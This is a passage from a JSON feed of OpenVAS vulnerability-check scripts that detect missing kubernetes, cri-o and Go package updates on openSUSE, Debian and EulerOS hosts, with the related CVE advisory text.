value:\"http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00041.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kubernetes'\n package(s) announced via the openSUSE-SU-2020:0554-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update introduces kubernetes version 1.14.1 and cri-o 1.17.1 to Leap\n 15.1.\n\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.1:\n\n zypper in -t patch openSUSE-2020-554=1\");\n\n script_tag(name:\"affected\", value:\"'kubernetes' package(s) on openSUSE Leap 15.1.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap15.1\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"cri-o\", rpm:\"cri-o~1.17.1~lp151.2.2\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cri-o-kubeadm-criconfig\", rpm:\"cri-o-kubeadm-criconfig~1.17.1~lp151.2.2\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cri-tools\", rpm:\"cri-tools~1.18.0~lp151.2.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"go1.14\", rpm:\"go1.14~1.14~lp151.6.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"go1.14-doc\", rpm:\"go1.14-doc~1.14~lp151.6.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"go1.14-race\", rpm:\"go1.14-race~1.14~lp151.6.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kubernetes-apiserver\", rpm:\"kubernetes-apiserver~1.18.0~lp151.5.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kubernetes-client\", rpm:\"kubernetes-client~1.18.0~lp151.5.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kubernetes-controller-manager\", rpm:\"kubernetes-controller-manager~1.18.0~lp151.5.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kubernetes-kubeadm\", rpm:\"kubernetes-kubeadm~1.18.0~lp151.5.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kubernetes-kubelet-common\", rpm:\"kubernetes-kubelet-common~1.18.0~lp151.5.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kubernetes-kubelet1.17\", rpm:\"kubernetes-kubelet1.17~1.18.0~lp151.5.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kubernetes-kubelet1.18\", rpm:\"kubernetes-kubelet1.18~1.18.0~lp151.5.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kubernetes-master\", rpm:\"kubernetes-master~1.18.0~lp151.5.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kubernetes-node\", rpm:\"kubernetes-node~1.18.0~lp151.5.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kubernetes-proxy\", rpm:\"kubernetes-proxy~1.18.0~lp151.5.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kubernetes-scheduler\", rpm:\"kubernetes-scheduler~1.18.0~lp151.5.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-31T16:30:52", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2020-01-09T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for go1.12 (openSUSE-SU-2019:2000-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-14809", "CVE-2019-9512", "CVE-2019-9514"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310852848", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310852848", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.852848\");\n script_version(\"2020-01-31T08:04:39+0000\");\n script_cve_id(\"CVE-2019-14809\", \"CVE-2019-9512\", \"CVE-2019-9514\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:04:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-09 09:36:02 +0000 (Thu, 09 Jan 2020)\");\n script_name(\"openSUSE: Security Advisory for go1.12 (openSUSE-SU-2019:2000-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap15\\.1\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2019:2000-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2019-08/msg00076.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'go1.12'\n package(s) announced via the openSUSE-SU-2019:2000-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for go1.12 fixes the following issues:\n\n Security issues fixed:\n\n - CVE-2019-9512: Fixed HTTP/2 flood using PING frames that results in\n unbounded memory growth. (bsc#1146111)\n\n - CVE-2019-9514: Fixed HTTP/2 implementation is vulnerable to a reset\n flood, potentially leading to a denial of service. (bsc#1146115)\n\n - CVE-2019-14809: Fixed authorization bypass due to malformed hosts in\n URLs. (bsc#1146123)\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.1:\n\n zypper in -t patch openSUSE-2019-2000=1\");\n\n script_tag(name:\"affected\", value:\"'go1.12' package(s) on openSUSE Leap 15.1.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap15.1\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"go1.12\", rpm:\"go1.12~1.12.9~lp151.2.9.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"go1.12-doc\", rpm:\"go1.12-doc~1.12.9~lp151.2.9.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"go1.12-race\", rpm:\"go1.12-race~1.12.9~lp151.2.9.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-01-31T16:27:54", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2020-01-09T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for go1.12 (openSUSE-SU-2019:2085-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-14809", "CVE-2019-9512", "CVE-2019-9514"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310852847", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310852847", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.852847\");\n script_version(\"2020-01-31T08:04:39+0000\");\n script_cve_id(\"CVE-2019-14809\", \"CVE-2019-9512\", \"CVE-2019-9514\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:04:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-09 09:35:56 +0000 (Thu, 09 Jan 2020)\");\n script_name(\"openSUSE: Security Advisory for go1.12 (openSUSE-SU-2019:2085-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap15\\.1\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2019:2085-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2019-09/msg00021.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'go1.12'\n package(s) announced via the openSUSE-SU-2019:2085-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for go1.12 fixes the following issues:\n\n Security issues fixed:\n\n - CVE-2019-9512: Fixed HTTP/2 flood using PING frames that results in\n unbounded memory growth (bsc#1146111).\n\n - CVE-2019-9514: Fixed HTTP/2 implementation that is vulnerable to a reset\n flood, potentially leading to a denial of service (bsc#1146115).\n\n - CVE-2019-14809: Fixed malformed hosts in URLs that leads to\n authorization bypass (bsc#1146123).\n\n Bugfixes:\n\n - Update to go version 1.12.9 (bsc#1141689).\n\n - Adding Web Assembly stuff from misc/wasm (bsc#1139210).\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.1:\n\n zypper in -t patch openSUSE-2019-2085=1\");\n\n script_tag(name:\"affected\", value:\"'go1.12' package(s) on openSUSE Leap 15.1.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap15.1\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"go1.12\", rpm:\"go1.12~1.12.9~lp151.2.17.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"go1.12-doc\", rpm:\"go1.12-doc~1.12.9~lp151.2.17.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"go1.12-race\", rpm:\"go1.12-race~1.12.9~lp151.2.17.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-01-27T18:36:38", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for golang (EulerOS-SA-2019-2078)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-14809", "CVE-2019-9512", "CVE-2019-9514"], "modified": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220192078", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220192078", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.2078\");\n script_version(\"2020-01-23T12:33:22+0000\");\n script_cve_id(\"CVE-2019-14809\", \"CVE-2019-9512\", \"CVE-2019-9514\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 12:33:22 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 12:33:22 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for golang (EulerOS-SA-2019-2078)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP8\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-2078\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-2078\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'golang' package(s) announced via the EulerOS-SA-2019-2078 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Some HTTP/2 implementations are vulnerable to ping floods, potentially leading to a denial of service. The attacker sends continual pings to an HTTP/2 peer, causing the peer to build an internal queue of responses. Depending on how efficiently this data is queued, this can consume excess CPU, memory, or both.(CVE-2019-9512)\n\nSome HTTP/2 implementations are vulnerable to a reset flood, potentially leading to a denial of service. The attacker opens a number of streams and sends an invalid request over each stream that should solicit a stream of RST_STREAM frames from the peer. Depending on how the peer queues the RST_STREAM frames, this can consume excess memory, CPU, or both.(CVE-2019-9514)\n\nnet/url in Go before 1.11.13 and 1.12.x before 1.12.8 mishandles malformed hosts in URLs, leading to an authorization bypass in some applications. This is related to a Host field with a suffix appearing in neither Hostname() nor Port(), and is related to a non-numeric port number. For example, an attacker can compose a crafted javascript:// URL that results in a hostname of google.com.(CVE-2019-14809)\");\n\n script_tag(name:\"affected\", value:\"'golang' package(s) on Huawei EulerOS V2.0SP8.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP8\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"golang\", rpm:\"golang~1.11~4.eulerosv2r8\", rls:\"EULEROS-2.0SP8\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"golang-bin\", rpm:\"golang-bin~1.11~4.eulerosv2r8\", rls:\"EULEROS-2.0SP8\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"golang-src\", rpm:\"golang-src~1.11~4.eulerosv2r8\", rls:\"EULEROS-2.0SP8\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-01-31T16:29:25", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2020-01-09T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for go1.12 (openSUSE-SU-2019:2130-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-14809", "CVE-2019-9512", "CVE-2019-9514"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310852903", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310852903", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.852903\");\n script_version(\"2020-01-31T08:04:39+0000\");\n script_cve_id(\"CVE-2019-14809\", \"CVE-2019-9512\", \"CVE-2019-9514\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:04:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-09 09:44:02 +0000 (Thu, 09 Jan 2020)\");\n script_name(\"openSUSE: Security Advisory for go1.12 (openSUSE-SU-2019:2130-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap15\\.1\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2019:2130-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2019-09/msg00038.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'go1.12'\n package(s) announced via the openSUSE-SU-2019:2130-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for go1.12 fixes the following issues:\n\n Security issues fixed:\n\n - CVE-2019-9512: Fixed HTTP/2 flood using PING frames that results in\n unbounded memory growth (bsc#1146111).\n\n - CVE-2019-9514: Fixed HTTP/2 implementation that is vulnerable to a reset\n flood, potentially leading to a denial of service (bsc#1146115).\n\n - CVE-2019-14809: Fixed malformed hosts in URLs that leads to\n authorization bypass (bsc#1146123).\n\n Bugfixes:\n\n - Update to go version 1.12.9 (bsc#1141689).\n\n - Adding Web Assembly stuff from misc/wasm (bsc#1139210).\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.1:\n\n zypper in -t patch openSUSE-2019-2130=1\");\n\n script_tag(name:\"affected\", value:\"'go1.12' package(s) on openSUSE Leap 15.1.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap15.1\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"go1.12\", rpm:\"go1.12~1.12.9~lp151.2.21.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"go1.12-doc\", rpm:\"go1.12-doc~1.12.9~lp151.2.21.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"go1.12-race\", rpm:\"go1.12-race~1.12.9~lp151.2.21.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-08-28T14:51:09", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-08-20T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 4503-1 (golang-1.11 - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-14809", "CVE-2019-9512", "CVE-2019-9514"], "modified": "2019-08-27T00:00:00", "id": "OPENVAS:1361412562310704503", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704503", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704503\");\n script_version(\"2019-08-27T07:56:59+0000\");\n script_cve_id(\"CVE-2019-14809\", \"CVE-2019-9512\", \"CVE-2019-9514\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-08-27 07:56:59 +0000 (Tue, 27 Aug 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-08-20 02:00:17 +0000 (Tue, 20 Aug 2019)\");\n script_name(\"Debian Security Advisory DSA 4503-1 (golang-1.11 - security update)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB10\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2019/dsa-4503.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DSA-4503-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'golang-1.11'\n package(s) announced via the DSA-4503-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Three vulnerabilities have been discovered in the Go programming language,\n'net/url' accepted some invalid hosts in URLs which could result in\nauthorisation bypass in some applications and the HTTP/2 implementation\nwas susceptible to denial of service.\");\n\n script_tag(name:\"affected\", value:\"'golang-1.11' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For the stable distribution (buster), these problems have been fixed in\nversion 1.11.6-1+deb10u1.\n\nWe recommend that you upgrade your golang-1.11 packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"golang-1.11\", ver:\"1.11.6-1+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"golang-1.11-doc\", ver:\"1.11.6-1+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"golang-1.11-go\", ver:\"1.11.6-1+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"golang-1.11-src\", ver:\"1.11.6-1+deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-01-31T16:54:18", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-09-03T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for go1.12 (openSUSE-SU-2019:2056-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-14809", "CVE-2019-9512", "CVE-2019-9514"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310852683", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310852683", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.852683\");\n script_version(\"2020-01-31T08:04:39+0000\");\n script_cve_id(\"CVE-2019-14809\", \"CVE-2019-9512\", \"CVE-2019-9514\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", 